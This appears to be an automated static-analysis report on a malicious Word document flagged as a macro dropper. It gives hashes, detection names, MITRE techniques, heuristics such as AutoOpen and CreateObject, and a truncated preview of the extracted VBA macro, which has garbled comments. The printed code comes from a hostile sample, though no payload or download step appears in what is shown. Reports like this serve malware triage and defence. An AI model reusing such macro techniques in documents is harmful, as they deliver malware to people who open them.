Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7eb2ab16de0ed41a…

MALICIOUS

Office (OLE)

100.0 KB Created: 2019-12-26 16:30:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: d5479549d153aa5629c827ee2e91359d SHA-1: 381810121c75c12ee99725d96a0ecf342154164a SHA-256: 7eb2ab16de0ed41ac977c9c0c2ab60b6a00baf4a95a7c71ec89c18bcfc8c6cf0
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-7481881-0'. Static analysis reveals the presence of a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes CreateObject, indicating an attempt to instantiate and run objects, likely for downloading and executing a second-stage payload. The presence of the 'macros.bas' artifact further supports the macro-based execution.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-7481881-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7481881-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 59079 bytes
SHA-256: d05667921426ee438f303546d9e88f041f605266a987cc674f28b910c27d6061
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const CP_UTF8                       As Long = 65001

#If Win64 Then
Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As LongPtr, ByVal dwFlags As LongPtr, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As LongPtr, lpMultiByteStr As Any, ByVal cchMultiByte As LongPtr, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As LongPtr
Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As LongPtr, ByVal dwFlags As LongPtr, lpMultiByteStr As Any, ByVal cchMultiByte As LongPtr, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As LongPtr) As Long
#Else
Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As Long, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As Long, ByVal lpUsedDefaultChar As Long) As Long
Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As Long, ByVal cchWideChar As Long) As Long

#End If
 

 
 Dim Dequl As Variant

Function CutBookName(openFileName As String) As String
    
    Dim oenPos As Long ' ??????
    Dim bookName As String
    
    '??? ?????????????
    YenPos = InStrRev(openFileName, " ")
    '???????
    bookName = Mid(openFileName, YenPos + 1)
    CutBookName = bookName
    
End Function

'????????????
Function GetTodayCol() As Long
    Dim cl As Variant
    Dim todayCol As Long
    
    Application.ScreenUpdating = False
    For Each cl In ThisWorkbook.Worksheets(WS_PLOT).Range("C3", "AU3")
        If ThisWorkbook.Worksheets(WS_PLOT).Range("A1").Value = cl.Value Then
            todayCol = cl.Column
            Exit For
        End If
    Next
    Application.ScreenUpdating = True
    
    If todayCol = 0 Then
        MsgBox "??????????????"
    Else
        GetTodayCol = todayCol
    End If
End Function




Sub Import_ProA()
Dim todayCol As Long
   
    Call BeginDialog("?????????????????", "??????????")
    Application.ScreenUpdating = False
    Application.CutCopyMode = False
    
    Dim openFileName As String
    Dim openBookName As String
    Dim shNameIn As String
    Dim lastRow As Long
    
    Application.StatusBar = "?? ???????????..."
    openFileName = Application.GetOpenFilename("Microsoft Excel,*.csv?")
    openBookName = CutBookName(openFileName)
    
    '???????????
    If openFileName <> "False" Then
        Call ?????
        Workbooks.Open openFileName
        If Workbooks(openBookName).Sheets(1).Range("A2") = "" Then
            lastRow = 2
        Else
            lastRow = Workbooks(openBookName).Sheets(1).Range("A1").End(xlDown).Row
        End If
        
        '???????????????
        If Workbooks(openBookName).Worksheets(1).Range("A1").Value = "??No" And _
           Workbooks(openBookName).Worksheets(1).Range("B1").Value = " ???" And _
           Workbooks(openBookName).Worksheets(1).Range("C1").Value = " ??" Then
            ThisWorkbook.Worksheets(WS_BUGLIST_A).Range("A2", "AL" & lastRow).Clear
            Workbooks(openBookName).Worksheets(1).Range("A2", "AL" & lastRow).Copy _
            Destination:=ThisWorkbook.Worksheets(WS_BUGLIST_A).Range("A2", "AL" & lastRow)
        Else
            MsgBox "?? ???????????????" & vbLf & "ProjectA??? ????????????"
            Application.StatusBar = False
            Application.DisplayAlerts = False
            Workbooks(openBookName).Close SaveChanges:=False
            Exit Sub
        End If
        
        Workbooks(openBookName).Close SaveChanges:=False
                
        MsgBox "?? ??????????
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.